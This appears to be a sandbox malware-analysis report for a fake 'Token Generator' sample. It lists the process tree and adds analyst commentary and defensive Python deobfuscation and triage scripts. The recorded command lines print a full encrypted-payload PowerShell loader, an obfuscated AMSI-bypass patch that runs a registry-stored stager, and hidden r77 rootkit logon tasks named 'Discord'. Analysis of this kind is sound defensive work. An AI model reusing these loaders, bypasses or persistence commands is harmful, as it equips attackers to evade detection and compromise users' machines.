C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Token Generator.bat"

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l7xIjD7w3X9IZsoce95u+FWxpwh41oGtZjuJWP8Q3+U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7Ji4GPB6lVnv6Xlch9sujw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $aXkIe=New-Object System.IO.MemoryStream(,$param_var); $bzUdJ=New-Object System.IO.MemoryStream; $mnRoM=New-Object System.IO.Compression.GZipStream($aXkIe, [IO.Compression.CompressionMode]::Decompress); $mnRoM.CopyTo($bzUdJ); $mnRoM.Dispose(); $aXkIe.Dispose(); $bzUdJ.Dispose(); $bzUdJ.ToArray();}function execute_function($param_var,$param2_var){ $ncCdx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $NjXjX=$ncCdx.EntryPoint; $NjXjX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Token Generator.bat';$jtmXF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Token Generator.bat').Split([Environment]::NewLine);foreach ($yxuaZ in $jtmXF) { if ($yxuaZ.StartsWith(':: ')) { $FJFrF=$yxuaZ.Substring(3); break; }}$payloads_var=[string[]]$FJFrF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_33_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_33.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_33.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_33.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l7xIjD7w3X9IZsoce95u+FWxpwh41oGtZjuJWP8Q3+U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7Ji4GPB6lVnv6Xlch9sujw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $aXkIe=New-Object System.IO.MemoryStream(,$param_var); $bzUdJ=New-Object System.IO.MemoryStream; $mnRoM=New-Object System.IO.Compression.GZipStream($aXkIe, [IO.Compression.CompressionMode]::Decompress); $mnRoM.CopyTo($bzUdJ); $mnRoM.Dispose(); $aXkIe.Dispose(); $bzUdJ.Dispose(); $bzUdJ.ToArray();}function execute_function($param_var,$param2_var){ $ncCdx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $NjXjX=$ncCdx.EntryPoint; $NjXjX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_33.bat';$jtmXF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_33.bat').Split([Environment]::NewLine);foreach ($yxuaZ in $jtmXF) { if ($yxuaZ.StartsWith(':: ')) { $FJFrF=$yxuaZ.Substring(3); break; }}$payloads_var=[string[]]$FJFrF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Users\Admin\AppData\Local\Temp\Token Generator.exe

"C:\Users\Admin\AppData\Local\Temp\Token Generator.exe"

C:\Users\Admin\AppData\Local\Temp\Install.exe

"C:\Users\Admin\AppData\Local\Temp\Install.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:RZldNxyYcDAh{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$DfzhPwccRrtCPB,[Parameter(Position=1)][Type]$JOvLQwFUeu)$vpPaKRwfUqx=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+'ed'+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+''+'y'+'M'+'o'+''+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+'p'+''+'e'+'','C'+'l'+''+'a'+''+[Char](115)+'s,'+'P'+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+'l'+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+'s'+''+[Char](105)+'C'+[Char](108)+'as'+[Char](115)+','+'A'+''+[Char](117)+''+'t'+'oC'+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$vpPaKRwfUqx.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+','+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+','+'Pu'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$DfzhPwccRrtCPB).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+[Char](97)+'n'+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');$vpPaKRwfUqx.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+'ke',''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+'i'+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+'o'+[Char](116)+''+[Char](44)+''+'V'+''+[Char](105)+'rt'+[Char](117)+''+[Char](97)+'l',$JOvLQwFUeu,$DfzhPwccRrtCPB).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $vpPaKRwfUqx.CreateType();}$NIEcYkjPoXXZX=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'s'+[Char](116)+''+'e'+''+'m'+''+[Char](46)+'d'+'l'+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+[Char](115)+'o'+'f'+'t'+[Char](46)+''+[Char](87)+''+'i'+'n'+[Char](51)+''+[Char](50)+''+'.'+'U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+''+[Char](111)+'d'+'s'+'');$hTxEXVpSnAdOgm=$NIEcYkjPoXXZX.GetMethod(''+'G'+''+'e'+'t'+[Char](80)+''+[Char](114)+''+[Char](111)+'cA'+'d'+''+[Char](100)+'r'+'e'+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+[Char](108)+'ic'+[Char](44)+''+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ZuhxFHMbdzbhQEOxywe=RZldNxyYcDAh @([String])([IntPtr]);$xOBkisexqIgllhKcpvOyTu=RZldNxyYcDAh @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$sdqnmrdbkMl=$NIEcYkjPoXXZX.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+'l'+''+[Char](101)+''+[Char](72)+'an'+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+[Char](51)+'2'+[Char](46)+'d'+[Char](108)+'l')));$DnxXOCIdcRsLJM=$hTxEXVpSnAdOgm.Invoke($Null,@([Object]$sdqnmrdbkMl,[Object](''+[Char](76)+''+'o'+'a'+[Char](100)+''+'L'+''+[Char](105)+''+[Char](98)+'ra'+'r'+''+'y'+''+'A'+'')));$PXvyitvJGJWSlQVDy=$hTxEXVpSnAdOgm.Invoke($Null,@([Object]$sdqnmrdbkMl,[Object](''+'V'+'irt'+'u'+''+[Char](97)+'l'+[Char](80)+''+[Char](114)+''+'o'+''+[Char](116)+''+[Char](101)+''+'c'+''+[Char](116)+'')));$FOdXqHa=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DnxXOCIdcRsLJM,$ZuhxFHMbdzbhQEOxywe).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$AoyFSQZKZeOCvfnrl=$hTxEXVpSnAdOgm.Invoke($Null,@([Object]$FOdXqHa,[Object](''+[Char](65)+'m'+[Char](115)+''+[Char](105)+''+'S'+'c'+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+''+'f'+'fe'+[Char](114)+'')));$lrXFsIyBpf=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PXvyitvJGJWSlQVDy,$xOBkisexqIgllhKcpvOyTu).Invoke($AoyFSQZKZeOCvfnrl,[uint32]8,4,[ref]$lrXFsIyBpf);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AoyFSQZKZeOCvfnrl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PXvyitvJGJWSlQVDy,$xOBkisexqIgllhKcpvOyTu).Invoke($AoyFSQZKZeOCvfnrl,[uint32]8,0x20,[ref]$lrXFsIyBpf);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
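
The command above is one PowerShell one-liner. Read in order it builds a delegate type with Reflection.Emit, pulls GetProcAddress and GetModuleHandle out of System.dll's Microsoft.Win32.UnsafeNativeMethods, resolves LoadLibraryA and VirtualProtect from kernel32.dll, loads amsi.dll, marks the first 8 bytes of AmsiScanBuffer PAGE_READWRITE (4), writes six bytes over them, restores PAGE_EXECUTE_READ (0x20), and finally loads a .NET assembly stored as the value $77stager under HKLM\SOFTWARE and calls its entry point. Every name is hidden behind 'a'+[Char](98)+... concatenation. The Python below is an added example, not part of the report or of the sample: it collapses those chains so the strings can be read, and decodes the six-byte stub (B8 57 00 07 80 C3 is mov eax,0x80070057 ; ret, so every AmsiScanBuffer call returns E_INVALIDARG and the caller proceeds as if nothing was flagged). SAMPLE is the tail of the command line copied from above; the regexes assume only the two token shapes this sample uses ('literal' and [Char](N)).

```python
from __future__ import annotations

import re

# Tail of the obfuscated command line recorded above, copied from the report and
# split at ';' purely for readability (adjacent literals concatenate).
SAMPLE = (
    r"$sdqnmrdbkMl=$NIEcYkjPoXXZX.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+'l'+''+[Char](101)+''+[Char](72)+'an'+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+[Char](51)+'2'+[Char](46)+'d'+[Char](108)+'l')));"
    r"$DnxXOCIdcRsLJM=$hTxEXVpSnAdOgm.Invoke($Null,@([Object]$sdqnmrdbkMl,[Object](''+[Char](76)+''+'o'+'a'+[Char](100)+''+'L'+''+[Char](105)+''+[Char](98)+'ra'+'r'+''+'y'+''+'A'+'')));"
    r"$PXvyitvJGJWSlQVDy=$hTxEXVpSnAdOgm.Invoke($Null,@([Object]$sdqnmrdbkMl,[Object](''+'V'+'irt'+'u'+''+[Char](97)+'l'+[Char](80)+''+[Char](114)+''+'o'+''+[Char](116)+''+[Char](101)+''+'c'+''+[Char](116)+'')));"
    r"$FOdXqHa=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DnxXOCIdcRsLJM,$ZuhxFHMbdzbhQEOxywe).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');"
    r"$AoyFSQZKZeOCvfnrl=$hTxEXVpSnAdOgm.Invoke($Null,@([Object]$FOdXqHa,[Object](''+[Char](65)+'m'+[Char](115)+''+[Char](105)+''+'S'+'c'+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+''+'f'+'fe'+[Char](114)+'')));"
    r"$lrXFsIyBpf=0;"
    r"[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PXvyitvJGJWSlQVDy,$xOBkisexqIgllhKcpvOyTu).Invoke($AoyFSQZKZeOCvfnrl,[uint32]8,4,[ref]$lrXFsIyBpf);"
    r"[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AoyFSQZKZeOCvfnrl,6);"
    r"[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PXvyitvJGJWSlQVDy,$xOBkisexqIgllhKcpvOyTu).Invoke($AoyFSQZKZeOCvfnrl,[uint32]8,0x20,[ref]$lrXFsIyBpf);"
    r"[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
)

# One concatenation chain: a 'literal' or [Char](N) token followed by zero or more
# "+ token" pairs.  A PowerShell escaped quote inside a literal ('it''s') shows up
# as two adjacent literals with no '+' between them, so it is left untouched.
_TOKEN = r"'[^']*'|\[char\]\(\d+\)"
CHAIN = re.compile(rf"(?:{_TOKEN})(?:\s*\+\s*(?:{_TOKEN}))*", re.IGNORECASE)
TOKEN = re.compile(r"'([^']*)'|\[char\]\((\d+)\)", re.IGNORECASE)


def _resolve(match: re.Match) -> str:
    parts = [chr(int(code)) if code else lit for lit, code in TOKEN.findall(match.group(0))]
    return "'" + "".join(parts) + "'"


def deobfuscate(cmd: str) -> str:
    """Collapse every 'a'+[Char](98)+'c' chain into the plain literal 'abc'."""
    return CHAIN.sub(_resolve, cmd)


def extract_strings(cmd: str) -> list[str]:
    """Non-empty quoted literals of the deobfuscated command, in order of appearance."""
    return [s for s in re.findall(r"'([^']*)'", deobfuscate(cmd)) if s]


def find_patch_bytes(cmd: str) -> bytes:
    """The [Byte[]](...) array the sample copies over the resolved export."""
    m = re.search(r"\[Byte\[\]\]\(([^)]*)\)", cmd, re.IGNORECASE)
    return bytes(int(x.strip(), 0) for x in m.group(1).split(",")) if m else b""


E_INVALIDARG = 0x80070057  # HRESULT_FROM_WIN32(ERROR_INVALID_PARAMETER)


def decode_patch(patch: bytes) -> dict | None:
    """Recognise the 6-byte 'mov eax, imm32 ; ret' stub (B8 xx xx xx xx C3).

    Any other byte pattern is reported as None rather than guessed at."""
    if len(patch) == 6 and patch[0] == 0xB8 and patch[5] == 0xC3:
        imm = int.from_bytes(patch[1:5], "little")
        return {"asm": f"mov eax, 0x{imm:08X}; ret", "hresult": imm,
                "e_invalidarg": imm == E_INVALIDARG}
    return None


if __name__ == "__main__":
    for s in extract_strings(SAMPLE):
        print(s)
    print(decode_patch(find_patch_bytes(SAMPLE)))
```

Run over the whole command line the same function also yields ReflectedDelegate, InMemoryModule, MyDelegateType, System.dll, Microsoft.Win32.UnsafeNativeMethods and GetProcAddress, which is what confirms the delegate-building prologue; the patch decoder deliberately refuses anything but the exact stub shape, so a variant using a different bypass (for example patching a conditional jump) is reported as unknown instead of mislabelled.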

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe" /rl HIGHEST /f
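
The task created here (and re-created twice more below) runs a binary from the user's Roaming profile at every logon with the highest run level the token allows, under a name borrowed from a consumer application; the $77- prefix on the directory and binary is the naming convention the r77 rootkit uses for objects it hides from user-mode enumeration, so on an infected host schtasks /query may not even list this task. The Python below is an added example, not part of the report: it splits the Windows command line without eating backslashes, recovers the schtasks switches, and returns the persistence indicators a triage script would flag. The path patterns in USER_WRITABLE are an assumption about where unprivileged users can write on a default Windows install.

```python
import re

# The scheduled-task command recorded above, copied from the process list.
SCHTASKS_CMD = r'"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe" /rl HIGHEST /f'

# Windows-style argument splitting for this purpose: a double-quoted run is one
# argument and backslashes are literal (shlex in POSIX mode would consume them).
_ARG = re.compile(r'"([^"]*)"|(\S+)')

# Directories an unprivileged user can write to (assumed set); persistence that
# launches from here needed no installer and no elevation to land.
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\appdata\\|\\users\\public\\|\\programdata\\|\\temp\\", re.I)

# r77 hides files, processes, registry keys and scheduled tasks whose names start
# with this prefix, so a hit here also means local enumeration may be lying.
R77_PREFIX = "$77"


def split_cmdline(cmd):
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in _ARG.finditer(cmd)]


def parse_schtasks(cmd):
    """Return (switches that take a value, bare flags); args[0] is the program."""
    args = split_cmdline(cmd)
    opts, flags = {}, set()
    i = 1
    while i < len(args):
        sw = args[i].lower()
        if sw.startswith("/") and i + 1 < len(args) and not args[i + 1].startswith("/"):
            opts[sw] = args[i + 1]
            i += 2
        else:
            flags.add(sw)
            i += 1
    return opts, flags


def triage_task(cmd):
    """Persistence indicators for one schtasks /create command line."""
    opts, flags = parse_schtasks(cmd)
    if "/create" not in flags:
        return []
    action = opts.get("/tr", "")
    findings = []
    if USER_WRITABLE.search(action):
        findings.append(f"action runs from a user-writable path: {action}")
    if opts.get("/sc", "").upper() == "ONLOGON":
        findings.append("ONLOGON trigger: re-executes at every sign-in")
    if opts.get("/rl", "").upper() == "HIGHEST":
        findings.append("/rl HIGHEST: asks for the highest run level the token allows")
    if R77_PREFIX in action:
        findings.append(f"path carries the {R77_PREFIX!r} r77 hide-prefix")
    if "/f" in flags:
        findings.append("/f: overwrites any existing task of that name without prompting")
    return findings


if __name__ == "__main__":
    for finding in triage_task(SCHTASKS_CMD):
        print("-", finding)
```

Because the rootkit prefix can blind schtasks.exe and Task Scheduler on the live host, the more reliable artefact to check is the task file itself under C:\Windows\System32\Tasks (here it would be named Discord) from a clean boot or a mounted image; the Files section below shows that the sandbox captured other task files from that directory.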

C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe

"C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{eabfa77e-2b59-44a3-9a8e-cd43c8bcccb3}

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe

"C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffd65cb46f8,0x7ffd65cb4708,0x7ffd65cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2288 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2804 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2280 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

